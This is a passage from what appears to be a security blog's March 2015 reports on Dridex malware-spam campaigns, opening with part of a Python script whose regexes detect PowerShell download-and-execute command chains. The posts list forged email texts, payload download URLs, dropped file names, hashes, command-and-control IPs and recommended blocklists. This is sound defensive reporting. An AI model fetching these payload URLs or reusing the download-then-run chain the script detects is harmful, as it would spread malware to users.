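    r"DownloadFile\(\s*'(?P<url>[^']+)'\s*,\s*'(?P<dest>[^']+)'\s*\)", re.I)
EXPAND_RE = re.compile(r"\bexpand\s+(?P<src>\S+)\s+(?P<dst>\S+)", re.I)
START_RE = re.compile(r"\bstart\s+(?P<exe>\S+)", re.I)

def _norm(path):
    # Drop the trailing ';' command separator and compare case-insensitively.
    return path.rstrip(";").lower()

def analyse_cmdline(cmd):
    """Return the download URL, dropped paths and findings for one command line."""
    findings = []
    if BYPASS_RE.search(cmd):
        findings.append("executionpolicy-bypass")
    dl = DOWNLOAD_RE.search(cmd)
    if dl:
        findings.append("webclient-downloadfile")
    ex = EXPAND_RE.search(cmd)
    if ex:
        findings.append("expand-in-cmdline")
    # The file that was just downloaded is fed straight into EXPAND ...
    if dl and ex and _norm(dl.group("dest")) == _norm(ex.group("src")):
        findings.append("download-then-expand-chain")
    st = START_RE.search(cmd)
    # ... and EXPAND's output is then executed.
    if st and ex and _norm(st.group("exe")) == _norm(ex.group("dst")):
        findings.append("executes-expanded-file")
    return {
        "url": dl.group("url") if dl else None,
        "dropped": [_norm(ex.group("src")), _norm(ex.group("dst"))] if ex else [],
        "findings": findings,
    }

def true_type(data):
    """Classify a file by its magic bytes, ignoring the extension."""
    if data[:4] == b"MSCF":
        return "cab"
    if data[:2] == b"MZ":
        return "pe"
    return "unknown"

def cab_is_really_pe(name, data):
    """True for the quirk described above: a '.cab' that is already a PE."""
    return name.lower().endswith(".cab") and true_type(data) == "pe"

if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        print(analyse_cmdline(cmd))
    # Constructed stand-in bytes, not the real sample: the start of a PE header.
    print(cab_is_really_pe("huiUGI8t8dsF.cab", b"MZ\x90\x00\x03\x00\x00\x00"))
```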
This Malwr report shows it downloading a DLL with an MD5 of a40e588e614e6a4c9253d261275288bf [VT 4/57] which is the same payload as found in this earlier spam run, along with another executable with an MD5 of 409397f092d3407f95be42903172cf06 which is not in the VirusTotal database. The report also shows the malware phoning home to the following IPs:
31.25.77.154 (Call U Communications, Palestine)
95.163.121.33 (Digital Networks CJSC aka DINETHOSTING, Russia)
188.165.5.194 (OVH, Ireland)
188.165.26.237 (OVH, Latvia)
115.241.60.56 (Reliance Communication, India)
46.19.143.151 (Private Layer INC, Switzerland)
Recommended blocklist:
Malware spam: "Confirmation of Booking" / "NWN Media Ltd" / "Della Richardson"
This spam is not from NWN Media Ltd but is instead a simple forgery sent out to random email addresses with a malicious attachment. NWN Media are not responsible for this spam, nor have their systems been compromised.
From: della.richards2124@nwn.co.uk [della.richards@nwn.co.uk]
Date: 18 March 2015 at 08:34
Subject: Confirmation of Booking
This booking confirmation forms a binding contract between yourselves and NWN Media Ltd.
If you do not agree with any of the details above then please contact the named sales representative on the above number immediately.
Yours sincerely,
Della
NWN Media Ltd
Attached is a file NWN Confirmation Letter.doc which I have so far seen in two different versions, both with low detection rates [1] [2] which contain slightly different malicious macros [1] [2] which then go and download a malicious binary from one of the following locations:
http://pmmarkt.de/js/bin.exe
http://deosiibude.de/deosiibude.de/js/bin.exe
These are saved as %TEMP%\zakilom86.exe and %TEMP%\Pikadlo64.exe respectively. The binaries are actually identical and have a VirusTotal detection rate of 5/57. According to the Malwr report this binary attempts to communicate with the following IPs:
31.41.45.211 (Relink Ltd, Russia)
109.234.159.250 (Selectel Ltd, Russia)
37.59.50.19 (OVH, France)
62.76.179.44 (Clodo-Cloud / IT House, Russia)
95.163.121.200 (Digital Networks CJSC aka DINETHOSTING, Russia)
It then drops what appears to be another version of itself, edg1.exe, onto the target system [VT 2/55], along with a malicious Dridex DLL [VT 3/55].
Recommended blocklist:
31.41.45.211
109.234.159.250
37.59.50.19
62.76.179.44
95.163.121.0/24
Saturday, 14 March 2015
Quttera fails and spews false positives everywhere
By chance, I found out that my blog had been blacklisted by Quttera. No big deal, because it happens from time to time due to the nature of the content on the site. But I discovered that it isn't just my blog: Quttera also blocks industry-leading sites such as Cisco, VMWare, Sophos, MITRE, AVG and Phishtank.
For example, at the time of writing the following domains are all blacklisted by Quttera (clicking the link shows the current blacklisting status):
www.cisco.com
www.vmware.com
cve.mitre.org
www.auscert.org.au
www.phishtank.com
www.buzzfeed.com
www.reddit.com
dl.dropbox.com
www.avg.com
www.malekal.com
nakedsecurity.sophos.com
blog.dynamoo.com
malware-traffic-analysis.net
blog.malwaremustdie.org
Cisco's blacklisting entry looks like this:
Now, you can ask Quttera to unblacklist your site for free by raising a ticket but the most prominent link leads to a paid service for £60/year. Hmmm.
I don't think that I will rush to subscribe to that. Obviously, something is seriously wrong with the algorithm in use; some of these sites should obviously be whitelisted. Quttera also doesn't understand the difference between a malicious domain or IP being mentioned and such a site being linked to or injected into a site.
I guess there are many, many more domains that are in a similar situation. Perhaps you might want to check your own web properties and share your findings in the comments?
Labels: Fail, False Positive
Friday, 13 March 2015
Malware spam: "Invoice (13\03\2015) for payment to COMPANY NAME"
There is a series of malware spams in progress in the following format:
Invoice (13\03\2015) for payment to JUPITER PRIMADONA GROWTH TRUST
Invoice (13\03\2015) for payment to CARD FACTORY PLC
Invoice (13\03\2015) for payment to CELTIC
Invoice (13\03\2015) for payment to MIRADA PLC
Note the use of the backslash in the date. There is an attachment in the format 1234XYZ.doc which I have seen three different variants of (although one of those was zero length), one of which was used in this spam run yesterday and one new one with zero detections which contains this malicious macro, which downloads another component from:
http://95.163.121.186/api/gbb1.exe
This is saved as %TEMP%\GHjkdfg.exe - incidentally, this server is wide open and is full of data and binaries relating to the Dridex campaign. Unsurprisingly, it is hosted on a Digital Networks CJSC aka DINETHOSTING IP address. This binary has a detection rate of 3/53 and the Malwr report shows it phoning home to 95.163.121.33 which is also in the same network neighbourhood.
The binary also drops a malicious Dridex DLL with a detection rate of 5/56. This is the same DLL as used in this spam run earlier today.
Recommended blocklist:
95.163.121.0/24
Malware spam: "pentafoods.com" / "Invoice: 2262004"
This fake Penta Foods spam run is another variant of this and it comes with a malicious attachment. Penta Foods are not sending this email, instead it is a simple forgery.
From: cc18923@pentafoods.com
Date: 13 March 2015 at 07:50
Subject: Invoice: 2262004
Please find attached invoice : 2262004
Any queries please contact us.
--
Automated mail message produced by DbMail.
Registered to Penta Foods, License MBA2009357.
Attached is a Word document R-1179776.doc which actually comes in two versions, both with zero detection rates, containing one of two malicious macros [1] [2] which then download a component from the following locations:
http://accalamh.aspone.cz/js/bin.exe
http://awbrs.com.au/js/bin.exe
This is saved as %TEMP%\fJChjfgD675eDTU.exe and has a VirusTotal detection rate of 5/57. Automated analysis tools [1] [2] show a phone-home attempt to:
62.76.179.44 (Clodo-Cloud / IT House, Russia)
My sources also indicate that it phones home to:
212.69.172.187 (Webagentur, Austria)
78.129.153.12 (iomart / RapidSwitch, UK)
According to this Malwr report it also drops a DLL with a detection rate of just 2/57 which is probably Dridex.
Recommended blocklist:
62.76.179.44
212.69.172.187
78.129.153.12
Thursday, 12 March 2015
Malware spam: "Invoice [1234XYZ] for payment to COMPANY NAME"
These rather terse emails appear to refer to various companies, and all come with a malicious attachment:
From: Erasmo Small
Date: 12 March 2015 at 09:40
Subject: Invoice [3479XZM] for payment to INCOME & GROWTH VCT PLC(THE)
From: Eli Ramirez
Date: 12 March 2015 at 08:37
Subject: Invoice [4053FJK] for payment to RANDGOLD RESOURCES
From: Richard Baxter
Date: 12 March 2015 at 08:37
Subject: Invoice [3020JQM] for payment to TARSUS GROUP PLC
From: Megan Dennis
Date: 12 March 2015 at 09:36
Subject: Invoice [4706CEZ] for payment to SHANKS GROUP
The attachment is a Word document with a name that matches the reference in the subject. So far, I have seen two different versions of this with low detection rates [1] [2] which contain these malicious macros [1] [2] [pastebin] which contain some quite entertaining obfuscation, but when deobfuscated try to download an additional component from the following locations:
https://92.63.88.102/api/gb1.exe
https://85.143.166.124/api/gb1.exe
Note the use of HTTPS. Those two IP addresses belong to:
92.63.88.102 (MWTV, Latvia)
85.143.166.124 (Pirix, Russia)
Both are well-known hosts for this sort of rubbish. According to the Malwr report this attempts to phone home to:
95.163.121.33 (Digital Networks CJSC aka DINETHOSTING, Russia)
Digital Networks is also a sea of crap. It also drops a Dridex DLL with a detection rate of 9/57.
Recommended blocklist:
95.163.121.0/24
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
85.143.166.0/24
Wednesday, 11 March 2015
Malware spam: "Voicemail Message (07813297716) From:07813297716"
When was the last time someone sent you a voice mail message by email? Never? There are no surprises to find that this spam email message has a malicious attachment.
From: Voicemail admin@victimdomain
Date: 11/03/2015 11:48
Subject: Voicemail Message (07813297716) From:07813297716
IP Office Voicemail redirected message
Attachment: MSG00311.WAV.ZIP
The attachment is a ZIP file containing a malicious EXE file called MSG00311.WAV.exe which has a VirusTotal detection rate of 5/57. According to the Malwr report, it pulls down another executable and some config files from:
http://wqg64j0ei.homepage.t-online.de/data/log.exe
http://cosmeticvet.su/conlib.php
This behaviour is very much like a Dridex downloader, a campaign that has mostly been using malicious macros rather than EXE-in-ZIP attacks.
The executable it drops has a detection rate of 2/54 and these Malwr reports [1] [2] show a further component download from:
http://muscleshop15.ru/js/jre.exe
http://test1.thienduongweb.com/js/jre.exe
This component has a detection rate of 5/57. According to the Malwr report for that we see (among other things) that it drops a DLL with a detection rate of 4/57 which is the same Dridex binary we've been seeing all day.
Piecing together the IP addresses found in those reports combined with some information from one of my intelligence feeds, we can see that the following IPs are involved in this activity:
31.41.45.211 (Relink Ltd, Russia)
62.213.67.115 (Caravan Telecom, Russia)
80.150.6.138 (Deutsche Telekom, Germany)
42.117.1.88 (FPT Telecom Company, Vietnam)
188.225.77.242 (TimeWeb Co. Ltd., Russia)
212.224.113.144 (First Colo GmbH, Germany)
37.59.50.19 (OVH, France)
62.76.179.44 (Clodo-Cloud, Russia)
95.163.121.200 (Digital Networks CJSC aka DINETHOSTING, Russia)
185.25.150.33 (NetDC.pl, Poland)
104.232.32.119 (Net3, US)
188.120.243.159 (TheFirst.RU, Russia)
Recommended blocklist:
Labels: DINETHOSTING, Dridex, EXE-in-ZIP, France, Malware, OVH, Poland, Russia, Spam, TheFirst-RU, Viruses, Voice Mail
Malware spam: Message from "RNP0026735991E2" / "inv.09.03"
This pair of spam emails are closely related and have a malicious attachment:
From: admin.scanner@victimdomain
Date: 11 March 2015 at 08:49
Subject: Message from "RNP0026735991E2"
This E-mail was sent from "RNP0026735991E2" (MP C305).
Scan Date: 11.03.2015 08:57:25 (+0100)
Queries to: admin.scanner@victimdomain
Attachment: 201503071457.xls
----------
From: Jora Service [jora.service@yahoo.com]
Date: 11 March 2015 at 09:27
Subject: inv.09.03
Attachment: INV 86-09.03.2015.xls
Neither XLS attachment is currently detected by AV vendors [1] [2] and they contain two related but slightly different macros [1] [2] which download a component from the following locations:
http://koschudu.homepage.t-online.de/js/bin.exe
http://03404eb.netsolhost.com/js/bin.exe
The file is then saved as %TEMP%\fJChjfgD675eDTU.exe which has a VirusTotal detection rate of 3/57. According to this Malwr report, it attempts to connect to the following IPs:
188.225.77.216 (TimeWeb Co. Ltd, Russia)
42.117.1.88 (FPT Telecom Company, Vietnam)
31.41.45.211 (Relink Ltd, Russia)
87.236.215.103 (OneGbits, Lithuania)
104.232.32.119 (Net3, US)
188.120.243.159 (TheFirst.RU, Russia)
It also drops a couple more malicious binaries with the following MD5s:
8d3a1903358c5f3700ffde113b93dea6 [VT 2/56]
53ba28120a193e53fa09b057cc1cbfa2 [VT 4/57]
Recommended blocklist: